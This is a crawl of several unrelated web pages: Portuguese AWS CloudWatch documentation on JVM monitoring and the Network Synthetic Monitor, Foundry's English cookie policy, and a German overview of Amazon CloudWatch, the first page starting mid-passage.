CloudWatchAgentConfigSSM , insira o nome do parâmetro do Systems Manager para a configuração do agente que você criou anteriormente, como AmazonCloudWatch-JVM-Configuration . Para selecionar as instâncias de destino, você tem duas opções. Para InstanceIds , especifique uma lista delimitada por vírgulas de IDs de instâncias nas quais você deseja instalar o agente do CloudWatch com esta configuração. É possível listar uma única instância ou várias instâncias. Se você estiver realizando implantações em grande escala, é possível especificar a TagKey e o TagValue correspondente para direcionar todas as instâncias do EC2 associadas a essa etiqueta e a esse valor. Se você especificar uma TagKey , é necessário especificar um TagValue correspondente. (Para um grupo do Auto Scaling, especifique aws:autoscaling:groupName para a TagKey e defina o nome do grupo do Auto Scaling para a TagValue para realizar a implantação em todas as instâncias do grupo do Auto Scaling.) Caso você especifique tanto os parâmetros InstanceIds quanto TagKeys , InstanceIds terá precedência, e as etiquetas serão desconsideradas. Analise as configurações e, em seguida, escolha Criar pilha . Se você desejar editar o arquivo de modelo previamente para personalizá-lo, selecione a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar o seguinte link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . nota Após a conclusão desta etapa, este parâmetro do Systems Manager será associado aos agentes do CloudWatch em execução nas instâncias de destino. Isto significa que: Se o parâmetro do Systems Manager for excluído, o agente será interrompido. Se o parâmetro do Systems Manager for editado, as alterações de configuração serão aplicadas automaticamente ao agente na frequência programada, que, por padrão, é de 30 dias. Se você desejar aplicar imediatamente as alterações a este parâmetro do Systems Manager, você deverá executar esta etapa novamente. Para obter mais informações sobre as associações, consulte Working with associations in Systems Manager . Etapa 4: verificar se a configuração do agente foi realizada corretamente É possível verificar se o agente do CloudWatch está instalado ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se o agente do CloudWatch não estiver instalado e em execução, certifique-se de que todas as configurações foram realizadas corretamente. Certifique-se de ter anexado um perfil com as permissões adequadas para a instância do EC2, conforme descrito na Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias . Certifique-se de ter configurado corretamente o JSON para o parâmetro do Systems Manager. Siga as etapas em Solução de problemas de instalação do atendente do CloudWatch com o CloudFormation . Se todas as configurações estiverem corretas, as métricas da JVM serão publicadas no CloudWatch e estarão disponíveis para visualização. É possível verificar no console do CloudWatch para assegurar que as métricas estão sendo publicadas corretamente. Como verificar se as métricas da JVM estão sendo publicadas no CloudWatch Abra o console do CloudWatch, em https://console.aws.amazon.com/cloudwatch/ . Escolha Métricas e, depois, Todas as métricas . Certifique-se de ter selecionado a região na qual a solução foi implantada, escolha Namespaces personalizados e, em seguida, selecione CWAgent . Pesquise pelas métricas mencionadas em Configuração do agente para hosts da JVM , como jvm.memory.heap.used . Caso encontre resultados para essas métricas, isso significa que elas estão sendo publicadas no CloudWatch. Criação de um painel para a solução da JVM O painel fornecido por esta solução apresenta métricas para a Java Virtual Machine (JVM) subjacente para o servidor. O painel fornece uma visão geral da JVM ao agregar e apresentar métricas de todas as instâncias, disponibilizando um resumo de alto nível sobre a integridade geral e o estado operacional. Além disso, o painel mostra um detalhamento dos principais colaboradores (que corresponde aos dez principais por widget de métrica) para cada métrica. Isso ajuda a identificar rapidamente discrepâncias ou instâncias que contribuem significativamente para as métricas observadas. O painel da solução não exibe métricas do EC2. Para visualizar as métricas relacionadas ao EC2, é necessário usar o painel automático do EC2 para acessar as métricas fornecidas diretamente pelo EC2 e usar o painel do console do EC2 para consultar as métricas do EC2 que são coletadas pelo agente do CloudWatch. Para obter mais informações sobre os painéis automáticos para serviços da AWS, consulte Visualização de um painel do CloudWatch para um único serviço da AWS . Para criar o painel, é possível usar as seguintes opções: Usar o console do CloudWatch para criar o painel. Usar o console do AWS CloudFormation para implantar o painel. Fazer o download do código de infraestrutura como código do AWS CloudFormation e integrá-lo como parte da automação de integração contínua (CI). Ao usar o console do CloudWatch para criar um painel, é possível visualizá-lo previamente antes de criá-lo e incorrer em custos. nota O painel criado com o CloudFormation nesta solução exibe métricas da região em que a solução está implantada. Certifique-se de que a pilha do CloudFormation seja criada na mesma região em que as métricas da JVM são publicadas. Se as métricas do agente do CloudWatch estiverem sendo publicadas em um namespace diferente de CWAgent (por exemplo, caso você tenha fornecido um namespace personalizado), será necessário alterar a configuração do CloudFormation para substituir CWAgent pelo namespace personalizado que você está usando. Como criar o painel usando o console do CloudWatch nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Abra o console do CloudWatch e acesse Criar painel usando este link: https://console.aws.amazon.com/cloudwatch/home?#dashboards?dashboardTemplate=JvmOnEc2&referrer=os-catalog . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Insira o nome do painel e, em seguida, escolha Criar painel . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Visualize previamente o painel e escolha Salvar para criá-lo. Como criar o painel usando o CloudFormation Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como JVMDashboardStack . Na seção Parâmetros , especifique o nome do painel no parâmetro DashboardName . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Confirme as funcionalidades de acesso relacionadas às transformações na seção Capacidades e transformações . Lembre-se de que o CloudFormation não adiciona recursos do IAM. Analise as configurações e, em seguida, escolha Criar pilha . Quando o status da pilha mostrar CREATE_COMPLETE , selecione a guia Recursos na pilha criada e, em seguida, escolha o link exibido em ID físico para acessar o painel. Como alternativa, é possível acessar o painel diretamente no console do CloudWatch ao selecionar Painéis no painel de navegação do console à esquerda e localizar o nome do painel na seção Painéis personalizados . Se você desejar editar o arquivo de modelo para personalizá-lo para atender a uma necessidade específica, é possível usar a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar este link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Como começar a usar o painel da JVM A seguir, apresentamos algumas tarefas que você pode realizar para explorar o novo painel da JVM. Essas tarefas permitem a validação do funcionamento correto do painel e fornecem uma experiência prática ao usá-lo para monitorar um grupo de processos da JVM. À medida que realiza as tarefas, você se familiarizará com a navegação no painel e com a interpretação das métricas visualizadas. Seleção de um grupo de processos Use a lista suspensa Nome do grupo de processos da JVM para selecionar o grupo de processos que você deseja monitorar. O painel será atualizado automaticamente para exibir as métricas para o grupo de processos selecionado. Caso você tenha várias aplicações ou ambientes em Java, cada um pode ser representado como um grupo de processos distinto. Selecionar o grupo de processos apropriado garante que você estará visualizando as métricas específicas para a aplicação ou para o ambiente que deseja analisar. Análise do uso de memória Na seção de visão geral do painel, localize os widgets de Porcentagem de uso de memória do heap e de Porcentagem de uso de memória não relacionada ao heap . Os widgets mostram a porcentagem de memória do heap e de memória não relacionada ao heap usadas em todas as JVMs no grupo de processos selecionado. Uma porcentagem elevada pode indicar pressão da memória, o que pode resultar em problemas de performance ou exceções OutOfMemoryError . Além disso, é possível realizar uma busca detalhada do uso de memória do heap por host na seção Uso de memória por host para identificar os hosts com maior utilização. Análise de threads e de classes carregadas Na seção Threads e classes carregadas pelo host , localize os widgets Contagem dos dez principais threads e Dez principais classes carregadas . Procure por JVMs que tenham um número anormalmente elevado de threads ou de classes em comparação com as demais. Um número excessivo de threads pode ser indicativo de vazamentos de threads ou de simultaneidade excessiva, enquanto um grande número de classes carregadas pode indicar possíveis vazamentos no carregador de classes ou problemas com a geração ineficiente de classes dinâmicas. Identificação de problemas de coleta de resíduos Na seção de Coleta de resíduos , localize os widgets Dez principais invocações de coleta de resíduos por minuto e Dez principais duração da coleta de resíduos , separados pelos diferentes tipos de coletor de lixo: Recente , Simultânea e Mista . Procure por JVMs que tenham um número anormalmente elevado de coleções ou de durações longas de coleta em comparação com as demais. Isso pode indicar problemas de configuração ou vazamentos de memória. O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Soluções de observabilidade do CloudWatch Workload do NGINX no EC2 Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/what-is-network-monitor.html#nw-monitor-limitations | Usar o Network Synthetic Monitor - Amazon CloudWatch Usar o Network Synthetic Monitor - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Atributos principais Terminologia e componentes Requisitos e limitações Usar o Network Synthetic Monitor O Network Synthetic Monitor fornece uma visibilidade da performance da rede que conecta as aplicações hospedadas na AWS aos seus destinos on-premises, e permite que você identifique a origem de qualquer degradação da performance da rede em questão de minutos. O Network Synthetic Monitor é totalmente gerenciado pela AWS e não exige agentes separados nos recursos monitorados. Use o Network Synthetic Monitor para visualizar a perda de pacotes e a latência das conexões de rede híbrida e definir alertas e limites. Em seguida, você pode adotar as medidas cabíveis para melhorar a experiência dos seus usuários finais com base nessas informações. O Network Synthetic Monitor é destinado a operadores de rede e desenvolvedores de aplicações que desejam insights em tempo real sobre a performance da rede. Principais recursos do Network Synthetic Monitor Use o Network Synthetic Monitor para comparar um ambiente de rede híbrido em constante mudança com métricas contínuas de latência e perda de pacotes em tempo real. Quando você se conecta usando o AWS Direct Connect, o Network Synthetic Monitor pode ajudar a diagnosticar rapidamente a degradação da rede na rede da AWS com o indicador de integridade da rede (NHI), que o Network Synthetic Monitor grava em sua conta do Amazon CloudWatch. A métrica do NHI é um valor binário, com base em uma pontuação probabilística sobre se a degradação da rede está na AWS. O Network Synthetic Monitor fornece um monitoramento com uma abordagem de agente totalmente gerenciado, o que significa que você não precisa instalar agentes em VPCs ou on-premises. Para começar, você só precisa especificar uma sub-rede da VPC e um endereço IP on-premises. É possível estabelecer uma conexão privada entre a VPC e os recursos do Network Synthetic Monitor usando AWS PrivateLink. Para obter mais informações, consulte Usar o CloudWatch, o CloudWatch Synthetics e o CloudWatch Network Monitoring com endpoints de VPC de interface . O Network Synthetic Monitor publica métricas no CloudWatch Metrics. Você pode criar painéis para visualizar as métricas, e também pode criar limites e alarmes acionáveis nas métricas específicas da sua aplicação. Para obter mais informações, consulte Como o Network Synthetic Monitor funciona . Terminologia e componentes do Network Synthetic Monitor Sondas : uma sonda é o tráfego enviado de um recurso hospedado na AWS para um endereço IP de destino on-premises. As métricas do Network Synthetic Monitor medidas pela sonda são gravadas na conta do CloudWatch para cada sonda configurada em um monitor. Monitor : um monitor exibe o desempenho da rede e outras informações de integridade do tráfego para o qual você criou sondas do Network Synthetic Monitor. Você adiciona sondas como parte da criação de um monitor e, em seguida, pode visualizar as informações de métricas de desempenho da rede usando o monitor. Ao criar um monitor para uma aplicação, você adiciona um recurso hospedado na AWS como a origem da rede. O Network Synthetic Monitor então cria uma lista de todas as possíveis sondas entre os recursos hospedados na AWS e os endereços IP de destino. Você seleciona os destinos para os quais deseja monitorar o tráfego. Origem da rede da AWS : uma origem de rede da AWS é uma sonda de monitor derivada da origem da AWS, que é uma sub-rede em qualquer uma das VPCs. Destino : é o destino na rede on-premises para a origem da rede da AWS. O destino é uma combinação dos endereços IP on-premises, dos protocolos de rede, das portas e do tamanho do pacote da rede. Os endereços IPv4 e IPv6 são compatíveis. Requisitos e limitações do Network Synthetic Monitor Veja abaixo um resumo dos requisitos e limitações do Network Synthetic Monitor. Para cotas (ou limites) específicos, consulte Network Synthetic Monitor . As sub-redes do monitor devem pertencer à mesma conta do monitor. O Network Synthetic Monitor não fornece failover de rede automático no caso de um problema de rede da AWS. Há uma cobrança para cada sonda que você cria. Para obter detalhes de preço, consulte Preços do Network Synthetic Monitor . O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Perfil vinculado a serviço Como o Network Synthetic Monitor funciona Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://foundryco.com/cookie-policy/ | Foundry Cookie Policy & GDPR Compliance Notice | Foundry Skip to content Search Contact us Translation available Select an experience Japan Global Search for: Search Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Audiences Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer portal The Intersection newsletter All resources About us Press Awards Work here Privacy / Compliance Licensing About Us Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO 100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer Portal The Intersection newsletter All Resources About us Press Awards Work here Privacy / Compliance Licensing About Us Contact Log in Edition - Select an experience Japan Global Cookie Policy FoundryCo.com This website and associated websites (“Website”) are owned and maintained by: FoundryCo, Inc. 501 2nd Street, Suite 650 San Francisco California 94107 USA Welcome! This Cookie Policy applies to the collection of certain information via cookies and other online similar technologies (“ Cookie(s) ”) when you visit a website operated by FoundryCo, Inc. (“ Foundry ” or “ we ”) or members of the Foundry group of companies (“Foundry Group Undertakings”). A full list of Foundry Group Undertakings, including contact details, is available here . This Cookie Policy describes Foundry’s policies and practices regarding its use of Cookies collected on this website. We care about your privacy and want you to understand how we collect, use and protect the information you share with us. More information about your privacy rights can be found in the Privacy Policy . What Are Cookies? Cookies are small text files that can be stored on your computer, tablet, or mobile device when you visit a Foundry website . Information collected by Cookies may qualify as personal data. Cookies used by Foundry may identify you as a unique user by means of a tracking identification. Foundry and/or Foundry Group Undertakings may place Cookies on your device when visiting a Foundry website for different purposes as described below. You may also receive external Cookies from third parties. Our marketing partners collect web viewing data to ensure that you see the most relevant advertising. More information about our partners and third-party Cookies can be found on our Privacy Settings tab in the footer of this page. In addition to using Cookies, Foundry websites may feature tools that allow sharing through third-party social media platforms, such as Facebook, X, or LinkedIn. Any personal information you share through these platforms may be used and collected by third parties on such platforms, and such interactions are subject to the privacy policies of the respective third parties. Why Do We Use Cookies? We may use several types of Cookies for the following purposes: Storing and/or accessing information on your device: we may store and access Cookies, device identifiers, or similar technologies (e.g., login-based, randomly assigned, or network-based identifiers), along with information such as browser type, language, screen size, and supported technologies on your device. This allows us to recognize your device each time it connects to our website or apps. Precise geolocation and device characteristics: we may collect precise geolocation data and use device scanning to identify your device characteristics. Personalized advertising and content: we may personalize advertising and content presented to you based on your profile. Your activity may be used to build or enhance your profile for personalized experiences. We may measure the performance of advertising and content and generate reports based on your and others’ activity. This data also helps improve our products and services. Social media: we may use Cookies and pixels, such as those from Facebook, X, and LinkedIn, to enable social media functionality. Analytics storage: we may use Cookies to help us understand how visitors interact with our website by collecting and analyzing usage data (e.g., visit duration) to improve functionality and user experience. The complete list of purposes and why we use Cookies is available on our Privacy Settings tab in the footer of this page. How Can You Change Your Cookie Preferences? You may update your Cookie preferences any time on our Privacy Settings tab in the footer of this page. Please keep in mind that if you disable certain Cookies, some features of Foundry websites may not operate as intended. Interactive Advertising Bureau (IAB) Framework Depending on your location, local data protection and/or electronic communications privacy laws may apply. To help ensure compliance with such requirements, Foundry participates in frameworks established by the Interactive Advertising Bureau (IAB), which offers guidance and policies to promote transparency and uphold user consent standards. In the European Union, Foundry is registered as a vendor under the IAB Europe Transparency & Consent Framework (TCF), which supports compliance with the General Data Protection Regulation (GDPR) and the ePrivacy Directive. Foundry’s identification number within the TCF is 1313. For more information about the TCF, please visit the IAB Europe website . In the United States, Foundry participates in the IAB Tech Lab Global Privacy Protocol (GPP), which is designed to ensure compliance with US data privacy laws. For more information about the GPP framework, please visit the IAB Tech Lab website . All Cookie banners implemented on Foundry’s websites are compliant with the TCF and GPP, as applicable of the location of the visitor. Cookie Policy Changes and Updates We reserve the right to amend this Cookie Policy from time to time as necessary. We will post a notice on this website if there are material changes to the Cookie Policy, but you should also check this Website periodically to review the current policy. An updated version of this Cookie Policy will be published on our website. This Cookie Policy was last updated in September 2025. How can we help? Get in touch If you have any questions, concerns, or complaints about Foundry’s practices around Cookies or this Cookie Policy, we encourage you to get in touch with our appointed Data Protection Officer at privacy@foundryco.com Last Updated: [September 2025] Download Cookie Policy External link Our brands Solutions Research Resources Events About Newsletter Contact us Work here Sitemap Topics Cookies: First-party & third-party Generative AI sponsorships Intent data IP address intelligence Reverse IP lookup Website visitor tracking Legal Terms of Service Privacy / Compliance Environmental Policy Copyright Notice Licensing CCPA IAB Europe TCF Regions ASEAN Australia & New Zealand Central Europe Germany India Middle East, Turkey, & Africa Nordics Southern Europe Western Europe Facebook Twitter LinkedIn ©2026 FoundryCo, Inc. All Rights Reserved. Privacy Policy Ad Choices Privacy Settings California: Do Not Sell My Information | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-infrastructure-monitoring-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS 